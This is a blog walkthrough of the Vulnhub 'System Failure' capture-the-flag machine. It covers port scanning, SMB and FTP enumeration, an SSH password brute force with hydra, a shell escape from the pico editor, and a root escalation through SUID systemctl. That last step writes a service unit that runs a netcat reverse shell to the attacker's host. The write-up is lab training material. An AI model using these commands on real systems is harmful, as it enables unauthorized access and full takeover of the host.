Windy's little blog

一切生活中的杂七杂八, and I like CTF.

Vulnhub System Failure Walkthrough

https://www.vulnhub.com/entry/system-failure-1,654/


Scan ports.

# Nmap 7.91 scan initiated Thu Mar 11 21:49:07 2021 as: nmap -sV -sC -p- -oN ports.log 192.168.56.80
Nmap scan report for 192.168.56.80
Host is up (0.014s latency).
Not shown: 65530 closed ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
22/tcp  open  ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 bb:02:d1:ee:91:11:fe:a0:b7:90:e6:e0:07:49:95:85 (RSA)
|   256 ef:e6:04:30:01:50:07:5d:2d:17:99:d1:00:3d:f2:d6 (ECDSA)
|_  256 80:7f:c5:96:0e:3d:66:b9:d6:a8:6f:59:fa:ca:86:36 (ED25519)
80/tcp  open  http        Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
Service Info: Host: SYSTEMFAILURE; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Enum smb, download file "share", check the content.

┌──(kali㉿mykali)-[~]
└─$ smbclient -L 192.168.56.80         
Enter WORKGROUP\kali's password: 
        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        anonymous       Disk      open
        IPC$            IPC       IPC Service (Samba 4.9.5-Debian)
SMB1 disabled -- no workgroup available
                                                                                                                                                                                                                     
┌──(kali㉿mykali)-[~]
└─$ smbclient //192.168.56.80/anonymous 
Enter WORKGROUP\kali's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Fri Dec 18 05:25:14 2020
  ..                                  D        0  Wed Dec 16 22:58:53 2020
  share                               N      220  Fri Dec 18 05:25:14 2020
                7205476 blocks of size 1024. 5406288 blocks available
smb: \> get share
getting file \share of size 220 as share (9.8 KiloBytes/sec) (average 9.8 KiloBytes/sec)
smb: \> quit

┌──(kali㉿mykali)-[~/Documents/systemfailure]
└─$ cat share                 
Guys, I left you access only here to give you my shared file, you have little time, I leave you the login credentials inside for FTP you will find some info, you have to hurry!

89492D216D0A212F8ED54FC5AC9D340B

Admin


Also, through smb, we can get 4 user's names.

┌──(kali㉿mykali)-[~/Documents/systemfailure]
└─$ enum4linux -a 192.168.56.80              
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Mar 12 22:35:43 2021
...
 ======================================================================== 
|    Users on 192.168.56.80 via RID cycling (RIDS: 500-550,1000-1050)    |
 ======================================================================== 
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-992311547-1957423116-3284270811
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\valex (Local User)
S-1-22-1-1001 Unix User\admin (Local User)
S-1-22-1-1002 Unix User\jin (Local User)
S-1-22-1-1003 Unix User\superadmin (Local User)
...


Decrypt the hash code.

图片.png


Ftp login as "admin" with the password, download here.txt.

┌──(kali㉿mykali)-[~/Documents/systemfailure]
└─$ ftp 192.168.56.80                                                                                                                                                                                          130 ⨯
Connected to 192.168.56.80.
220 (vsFTPd 3.0.3)
Name (192.168.56.80:kali): admin
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Dec 16 12:45 Interesting
drwxr-xr-x    2 0        0            4096 Dec 16 12:45 Secr3t
drwxr-xr-x    3 0        0            4096 Dec 20 05:25 Syst3m
drwxr-xr-x    2 0        0            4096 Dec 16 12:45 Useful
ftp> cd Syst3m
250 Directory successfully changed.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    3 0        0            4096 Dec 20 05:25 .
drwxr-xr-x    8 1001     1001         4096 Dec 24 10:33 ..
drwxr-xr-x    2 0        0           36864 Dec 20 05:30 F4iluR3
-rw-r--r--    1 0        0              89 Dec 20 05:17 here.txt
226 Directory send OK.


Check here.txt.

┌──(kali㉿mykali)-[~/Documents/systemfailure]
└─$ cat here.txt  
(I l3f7 y0u 0ur s3cr3t c0d3)+(I l3f7 17 ju57 f0r y0u)+(t0 m4k3)x(7h1ng5 s4f3r.)
-Admin

In F4iluR3 folder, there are about 1000 files, turn off interactive mode, download them all.

ftp> prompt off
Interactive mode off.
ftp> mget *
local: file.txt remote: file.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for file.txt (1696 bytes).
226 Transfer complete.
1696 bytes received in 0.00 secs (5.1841 MB/s)
local: file0001.txt remote: file0001.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for file0001.txt (1696 bytes).
226 Transfer complete.
...

List all the files, sort by size, only one file is different than others. Check the content, find a strange string.

┌──(kali㉿mykali)-[~/Documents/systemfailure/F4iluR3]
└─$ ls -laSr...
-rw-r--r-- 1 kali kali  1696 Mar 12 22:44 file0002.txt
-rw-r--r-- 1 kali kali  1696 Mar 12 22:44 file0001.txt
-rw-r--r-- 1 kali kali  1714 Mar 12 22:46 file0189.txt
drwxr-xr-x 6 kali kali 32768 Mar 12 22:46 ..
drwxr-xr-x 2 kali kali 32768 Mar 12 22:46 .
                                                                                                                                                                                                                     
┌──(kali㉿mykali)-[~/Documents/systemfailure/F4iluR3]
└─$ cat file0189.txt 
Systems Failure is a role-playing game written by Bill Coffin and published by Palladium Books in July 1999.The fictional premise for the game is that during the "Millennium bug" scare, 
actual "Bugs" appeared. They are energy beings from beyond Earth (whether another dimension or another planet is not clear) that invaded at the end of 1999, leaving a post-apocalyptic 
world in their wake. The Bugs feed on energy and are capable of transmitting themselves through modern power transmission and phone lines.The Bugs come in several varieties. There are 
the drone-like Army Ants who have only basic intelligence, the more intelligent Assassin Bugs who can replicate human speech, though imperfectly, and the flying Lightning Bugs, amongst 
others. All of them are able to turn themselves into energy or rapidly call up reinforcements. In addition to these, there are "brain bugs", a variety that can invade human minds and 
turn them into zombie-like servants of the Bugs.Players take the part of survivors of this invasion ten years after it occurred. Some groups, such as survival-oriented militias, were 
well-prepared for something to go wrong and so form the nuclei of stable societies and resistance to the Bugs. Military units have converged on NORAD which is using genetic engineering 
to create new weapons that the Bugs cannot gain control of, and to create super-soldiers-J310MIYla1aVUaSV-, both those that have psionic powers and those who have been mutated into 
insect-like supermen using Bug DNA. In addition, there are people who have been driven mad by the stress, those who have joined gangs and seek to exploit others, and those who trade 
their skills as mechanics, medics, scientists, or merchants.


Decrypt the string with base62.

图片.png


Check http://192.168.56.80/area4/Sup3rS3cR37/System/, get two files. Userful.txt seems a dictionary.

┌──(kali㉿mykali)-[~/Documents/systemfailure/F4iluR3]
└─$ curl http://192.168.56.80/area4/Sup3rS3cR37/System/note.txt
Guys, I left something here for you, I know your skills well, we must try to hurry. Not always everything goes the right way.
-Admin
┌──(kali㉿mykali)-[~/Documents/systemfailure/F4iluR3]
└─$ curl http://192.168.56.80/area4/Sup3rS3cR37/System/useful.txt                                                                                                                                           
andres
courtney
booboo
kissme
harley
ronaldo
...


Brute force ssh with names enumd from smb and dictionary. Take care the note.txt, "right" way. So we need to set "-e r" in hydra.

┌──(kali㉿mykali)-[~/Documents/systemfailure]
└─$ hydra -L names.txt -P useful.txt  -e nsr 192.168.56.80 ssh -t 32        
...
[DATA] attacking ssh://192.168.56.80:22/
[STATUS] 283.00 tries/min, 283 tries in 00:01h, 782 to do in 00:03h, 32 active
[22][ssh] host: 192.168.56.80   login: valex   password: ...
1 of 1 target successfully completed, 1 valid password found

Ssh log in as valex, check sudo.

valex@SystemFailure:~$ sudo -l
sudo: unable to resolve host SystemFailure: Temporary failure in name resolution
Matching Defaults entries for valex on SystemFailure:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User valex may run the following commands on SystemFailure:
    (jin) NOPASSWD: /usr/bin/pico


Run /usr/bin/pico, looks like nano. We can escalate to user jin through nano.

pico
^R^X
reset; sh 1>&0 2>&0

As user jin, check SUID file.

jin@SystemFailure:~$ find / -perm -u=s 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/mount
/usr/bin/umount
/usr/bin/systemctl
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/su
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn

Get root through systemctl.

jin@SystemFailure:~$ echo '[Service]
> Type=oneshot
> ExecStart=nc 192.168.56.150 2234 -e /bin/bash
> [Install]
> WantedBy=multi-user.target' > $TF
jin@SystemFailure:~$ /usr/bin/systemctl  link $TF
Created symlink /etc/systemd/system/tmp.noEJj88ESX.service → /tmp/tmp.noEJj88ESX.service.
jin@SystemFailure:~$ /usr/bin/systemctl  enable --now $TF
Created symlink /etc/systemd/system/multi-user.target.wants/tmp.noEJj88ESX.service → /tmp/tmp.noEJj88ESX.service.


Check root flag.

listening on [any] 2234 ...
connect to [192.168.56.150] from (UNKNOWN) [192.168.56.80] 42672
cd /root
ls
root.txt
id;hostname;cat root.txt
uid=0(root) gid=0(root) groups=0(root)
SystemFailure
If you are reading this flag, without being rooted, it is not valid. You must enter after send me a picture you entered jin, and tag me. Good luck.


发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Powered By Z-BlogPHP 1.7.0